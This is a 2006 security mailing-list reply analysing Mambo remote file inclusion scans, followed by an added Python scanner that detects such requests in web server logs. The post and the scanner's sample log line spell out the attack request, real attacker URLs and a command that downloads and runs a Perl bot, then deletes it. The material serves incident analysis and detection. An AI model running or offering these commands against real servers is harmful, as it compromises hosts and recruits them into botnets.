Security Incidents mailing list archives
Re: High volume of Mambo scans (perlb0t)
From: Peter Kosinar <goober () ksp sk>
Date: Mon, 15 May 2006 19:26:29 +0200 (CEST)
Hello,
> I was looking at the scripts they try to download and it does not look like a common perl bot (connecting to irc). It's also written in php and by a brazilian person (comments in portuguese) and with terrible code :) I didn't have time to fully look at it, though. These are the pages they access:
> http://usuarios.lycos.es/athos666/d25/
> http://usuarios.lycos.es/athos666/d25/therules25.dat
> http://radius01.comete.ci/tool.gif
Actually, the tool.gif file (and the other parts of it) is just the first level of the attack machinery -- it's _the_ PHP script which actually gets remotely included and it understands some simple commands and displays the results in nice form. In this particular case, the interesting argument is "cmd=..." which executes the given command.
As you can see from the remaining portion of the request, the executed compound command in this case consisted of:
1) cd /tmp
2) wget http://radius01.comete.ci/session.gif
3) perl session.gif
4) rm -rf session.*

The session.gif file is the Perlbot I and other posters mentioned.

Peter

--
[Name] Peter Kosinar [Quote] 2B | ~2B = exp(i*PI) [ICQ] 134813278
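The two-stage chain Peter describes (a remotely included PHP script driven by a "cmd=" parameter, whose compound command fetches and runs the Perl bot) is easy to pick out of a web server log once the request is decoded. The following is an added example for this thread, not code posted by Peter, Daniel or anyone else on the list. It assumes Apache combined log format; the sample lines are constructed, and the parameter name "mosConfig_absolute_path" is an assumption about the Mambo scans, not something stated in the thread. The URLs are the ones quoted above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (not from the original post). The first mirrors the
# request shape described in the thread: one query parameter pointing at a
# remote script (the remote-include stage) plus a cmd= parameter carrying the
# compound shell command. The trailing "?" on the included URL is a common RFI
# trick that turns whatever the application appends into a harmless query string.
SAMPLE_LOG = """\
203.0.113.7 - - [15/May/2006:19:26:29 +0200] "GET /index.php?option=com_content&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.* HTTP/1.1" 200 1432 "-" "Mozilla/4.0"
198.51.100.4 - - [15/May/2006:19:27:02 +0200] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 8731 "-" "Mozilla/5.0"
"""

# Apache combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a URL is the remote-include indicator.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Any URL embedded in the decoded command is a second-stage download.
URL_IN_TEXT_RE = re.compile(r'(?:https?|ftp)://\S+', re.IGNORECASE)
# Shell operators that join one command to the next (naive: ignores quoting).
SHELL_SPLIT_RE = re.compile(r'\s*(?:;|&&|\|\||\|)\s*')


def parse_query(target):
    """Split a request target into path and decoded (key, value) pairs.

    Splitting on '&' by hand rather than with parse_qs keeps the ';' inside
    the cmd= value intact; older parse_qs versions treat ';' as a separator.
    """
    path, _, query = target.partition("?")
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.append((unquote_plus(key), unquote_plus(value)))
    return path, params


def analyse_request(line):
    """Return a finding dict for a remote-include / cmd= request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, params = parse_query(m.group("target"))
    finding = {
        "ip": m.group("ip"),
        "path": path,
        "include_urls": [],   # stage 1: the script that gets remotely included
        "commands": [],       # the compound command, one entry per shell command
        "payload_urls": [],   # stage 2: whatever the command downloads
    }
    for key, value in params:
        if REMOTE_URL_RE.match(value):
            finding["include_urls"].append((key, value))
        if key.lower() == "cmd" and value:
            finding["commands"] = [c for c in SHELL_SPLIT_RE.split(value) if c]
    for cmd in finding["commands"]:
        finding["payload_urls"].extend(URL_IN_TEXT_RE.findall(cmd))
    if finding["include_urls"] or finding["commands"]:
        return finding
    return None


def scan_log(text):
    """Run analyse_request over every line and keep only the hits."""
    return [f for f in (analyse_request(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["path"])
        for key, url in f["include_urls"]:
            print("  stage 1 include via", key, "->", url)
        for i, cmd in enumerate(f["commands"], 1):
            print(f"  {i}) {cmd}")
        for url in f["payload_urls"]:
            print("  stage 2 payload ->", url)
```

The output reproduces the four-step compound command Peter lists and separates the two hosts worth blocking or pivoting on: the one serving the included PHP script and the one serving the Perl bot. The command splitter is deliberately simple; a real attacker can hide separators inside quotes or backticks, so treat the split as a convenience for reading, not a security boundary.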
Current thread:
- Re: High volume of Mambo scans (perlb0t) Jamie Riden (May 14)
- Re: High volume of Mambo scans (perlb0t) Daniel Cid (May 15)
- Re: High volume of Mambo scans (perlb0t) Yuri Slobodyanyuk (May 15)
- Re: High volume of Mambo scans (perlb0t) Peter Kosinar (May 15)
- Re: High volume of Mambo scans (perlb0t) Daniel Cid (May 15)